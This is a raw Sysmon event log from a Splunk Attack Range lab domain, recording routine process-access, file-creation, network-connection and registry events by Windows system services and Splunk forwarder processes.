14:55:57.168{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049891Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:57.168{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049890Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:57.168{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049889Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:57.168{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049888Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:57.168{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049887Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:57.168{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049886Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:57.168{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049885Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:57.168{85C0FFC9-B7EC-607E-0500-00000000BB01}4161008C:\Windows\system32\csrss.exe{85C0FFC9-EB7D-607E-DE06-00000000BB01}1012C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000049884Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:57.168{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-EB7D-607E-DE06-00000000BB01}1012C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000049883Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:57.169{85C0FFC9-EB7D-607E-DE06-00000000BB01}1012C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000049882Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:57.106{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7294A75006DB62836A559A1B8DAA039D,SHA256=20CD001AF1B91505EF026C971DAF1B9EC2B84FBA28C09791386A9E07D4732E6D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072300Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:58.751{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=F985E1E51BD4FEB45E4931E1523E80EA,SHA256=E168C793E8F8BB7D1EAC66F2B963AAC5E0DD0FE2CCEBAB9CCFC61E8C70CE4293,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000072299Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.234{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local54188- 354300x800000000000000072298Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.038{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com59499-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000072297Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:56.227{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local54402- 23542300x800000000000000072296Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:58.188{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=C6E9ACD969374FFC2750925E64D66FC6,SHA256=4BB191B80A2750F6DF7D8310F8C927FDB78B02A918DC8E9AB7887CB7D3592137,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072295Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:58.188{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=360A5B1B9B922890BEE2EA4490400BCC,SHA256=E397C6489A8E2603FD71222C7EC64403CF6CC17C5BA4962ECE647DE96347D03C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072294Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:58.188{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=64AC2DD8FDB39EFF63A9571F1DAECD0C,SHA256=6B5778375C5F3100C964FB01AD7DA61FCB9B39BE84934D1E331C6218470E7D21,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000072293Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:58.016{A7A01FEF-EB7D-607E-9A0B-00000000BB01}6244C:\Windows\System32\wevtutil.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\AirSpaceChannel\TypeDWORD (0x00000002) 13241300x800000000000000072292Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:58.016{A7A01FEF-EB7D-607E-9A0B-00000000BB01}6244C:\Windows\System32\wevtutil.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\AirSpaceChannel\IsolationDWORD (0x00000000) 13241300x800000000000000072291Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:58.016{A7A01FEF-EB7D-607E-9A0B-00000000BB01}6244C:\Windows\System32\wevtutil.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\AirSpaceChannel\OwningPublisher{f562bb8e-422d-4b5c-b20e-90d710f7d11c} 10341000x800000000000000049929Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:58.621{85C0FFC9-EB7E-607E-E006-00000000BB01}1332716C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049928Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:58.512{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-EB7E-607E-E006-00000000BB01}1332C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049927Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:58.512{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049926Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:58.512{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049925Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:58.512{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049924Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:58.512{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049923Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:58.512{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049922Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:58.512{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049921Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:58.512{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049920Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:58.512{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049919Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:58.512{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049918Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:58.512{85C0FFC9-B7EC-607E-0500-00000000BB01}416532C:\Windows\system32\csrss.exe{85C0FFC9-EB7E-607E-E006-00000000BB01}1332C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000049917Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 